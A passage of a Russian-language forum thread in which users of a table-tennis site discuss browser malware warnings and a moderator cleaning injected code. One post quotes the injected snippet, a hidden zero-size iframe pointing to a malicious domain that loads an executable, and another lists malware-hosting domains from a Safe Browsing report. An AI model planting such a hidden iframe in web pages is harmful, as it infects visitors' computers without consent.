мобильное приложение мелбет

Возможная вирусная атака!

Форумы Общие форумы О конференции Возможная вирусная атака!

  • В этой теме 137 ответов, 34 участника, последнее обновление 03.11.2013 в 20:37 сделано Fan.
Просмотр 15 сообщений - с 61 по 75 (из 138 всего)
  • Автор

    Сообщения

  • #326404

    zxc

        • Всего сообщений: 392

      Меня тоже яндекс предупреждает, нельзя ли защитить сайт по лучше

      #326405

      akoozab

      Участник
          • Всего сообщений: 1169

        сайт периодически заражают ❗

        http://remont-i-tochka.ru/

        #326406

        Fan

        Хранитель
            • Всего сообщений: 10016

          Нашёл рекламный код (эксплойт) и удалил. Проверьте сейчас, пожалуйста.
          P.S. По поводу уязвимости. Любой сайт можно повредить. Стараюсь как можно быстрее вылавливать всю грязь. И, конечно же, ищу эти дыры, через которые возможны подобные действия.

          Мой TTW-рейтинг
          Stiga Clipper OverSize / FH: Butterfly Bryce max / BH: DHS Hurricane C 1.5 mm

          #326407

          BOBAH

          Участник
              • Всего сообщений: 1728

            Сайт может угрожать безопасности вашего компьютера или мобильного устройства Вот такая надпись появляется после набора в яндексе TTW. Антивирус-каспер-лицензия, обновляется постоянно. Fan-видимо не все нашел.

            Butterfly TAMCA PRIMORAC CARBON OFF+
            Butterfly Tenergy 05 ФэХэ 2,1/Butterfly Tenergy 05 ФэХэ 2,1

            #326408

            Fan

            Хранитель
                • Всего сообщений: 10016

              @BOBAH wrote:

              Сайт может угрожать безопасности вашего компьютера или мобильного устройства Вот такая надпись появляется после набора в яндексе TTW. Антивирус-каспер-лицензия, обновляется постоянно. Fan-видимо не все нашел.

              Дело в том, что данное предупреждение в яндексе появляется не автоматически, а устанавливается вручную группой техподдержки. Я уже отписал в поддержку яндекса о том, что эксплойт (код) удалён. Они должны, думаю, во вторник снять это предупреждение.

              Мой TTW-рейтинг
              Stiga Clipper OverSize / FH: Butterfly Bryce max / BH: DHS Hurricane C 1.5 mm

              #326409

              Sever8

                  • Всего сообщений: 7609

                Уже сняли предупреждение…

                #326410

                Alex_ping

                    • Всего сообщений: 591

                  На каждой странице сайта фрейм:

                  {iframe src=»http://static-google.net/main/index.php» width=»0″ height=»0″ frameborder=»0″}{/iframe}

                  (скобки только угловые, а не фигурные), который подгружает экзешник с вирусом.

                  Рекомендую после вычищения сменить пароли на фтп (стоит Фар?).

                  #326411

                  victor

                  Участник
                      • Всего сообщений: 6075

                    У меня тоже Хром ругается вот так
                    ***********************************
                    Безопасный просмотр
                    Страница диагностики для ttw.ru

                    Занесен ли сайт ttw.ru в список подозрительных?
                    Сайт занесен в список подозрительных. Посещение этого сайта может нанести вред вашему компьютеру.

                    В некоторой части этого сайта за последние 90 дней была замечена подозрительная активность (число таких случаев: 2).

                    Что произошло во время последнего посещения этого сайта компанией Google?
                    На 4 из 9 страниц сайта, протестированных нами за последние 90 дней, происходила загрузка и установка вредоносного ПО без согласия пользователя. Последнее посещение этого сайта системой Google произошло 2012-11-02; последний раз подозрительный контент был обнаружен на этом сайте 2012-11-02.
                    Вредоносное ПО включает 5 scripting exploit(s).

                    Число доменов, на которых размещается вредоносное ПО: 5 (в том числе static-google.net/, frcmeuckiml.brb.dj/, plnbz.lflinkup.com/).

                    Число доменов, предположительно используемых в качестве промежуточных звеньев для распространения вредоносного ПО: 1 (в том числе static-google.net/).

                    Сетей, в которых размещался этот сайт: 2 (в том числе AS25229 (VOLIA), AS15169 (Google Internet Backbone)).

                    Был ли этот сайт промежуточным звеном в дальнейшем распространении вредоносного ПО?
                    По всей видимости, за последние 90 дней сайт ttw.ru не использовался в качестве промежуточного звена для заражения других сайтов.

                    Размещалось ли на этом сайте вредоносное ПО?
                    Нет. За последние 90 дней на этом сайте не размещалось вредоносное ПО.

                    Как это произошло?
                    В некоторых случаях третьи лица могут добавлять вредоносный код на сайты, созданные со вполне законными целями. Предупреждение могло быть показано нами именно по этой причине.

                    Дальнейшие действия:
                    Вернуться на предыдущую страницу.
                    Если вы владелец этого веб-сайта, можете запросить анализ вашего сайта с помощью Инструментов Google для веб-мастеров. Дополнительные сведения о процессе анализа см. в Справочном центре Инструментов Google для веб-мастеров.

                    У меня на TTW не работает личная почта.

                    #326412

                    igr_ok

                        • Всего сообщений: 1782

                      моя безопасность обнаружила 2 трояна ,которые я удалил

                      #326413

                      putt

                          • Всего сообщений: 366

                        Такая же проблема.

                        FH@ genote power-peak
                        BH@ baracuda

                        #326414

                        zxc

                            • Всего сообщений: 392

                          Кто-нибудь от вирусов сайт очистит ?

                          #326415

                          xodoc

                          Участник
                              • Всего сообщений: 2158

                            Моя пока один тормознула. Щас на Алексея выйду.

                            FIREWALL PLUS, BLUEFIRE JP03 1,8, GRASS D.TECS ОХ кр
                            NEOTTEC BALSA CARBON, TENERGY 64 1,7, SPINLORD DORNENGLANZ ОХ

                            #326416

                            xodoc

                            Участник
                                • Всего сообщений: 2158

                              Бяка весит на главной странице, Fan устраняет проблему.

                              FIREWALL PLUS, BLUEFIRE JP03 1,8, GRASS D.TECS ОХ кр
                              NEOTTEC BALSA CARBON, TENERGY 64 1,7, SPINLORD DORNENGLANZ ОХ

                              #326417

                              Ne_mor

                                  • Всего сообщений: 1232

                                Google Chrome и Opera — предупредили об опасности посещения сайта, а Firefox и IE спокойно открывают! Так что используем Хром и Оперу — надёжнее будет!

                                #326418

                                glyhoi

                                Участник
                                    • Всего сообщений: 4117

                                  У меня Опера молчит,как и Мозилла.
                                  Хром предупреждает.

                                  мы собаки дворовые,не породистые.
                                  tabletennis.ucoz.com

                                Просмотр 15 сообщений - с 61 по 75 (из 138 всего)
                                • Для ответа в этой теме необходимо авторизоваться.
                                Просмотров: 1363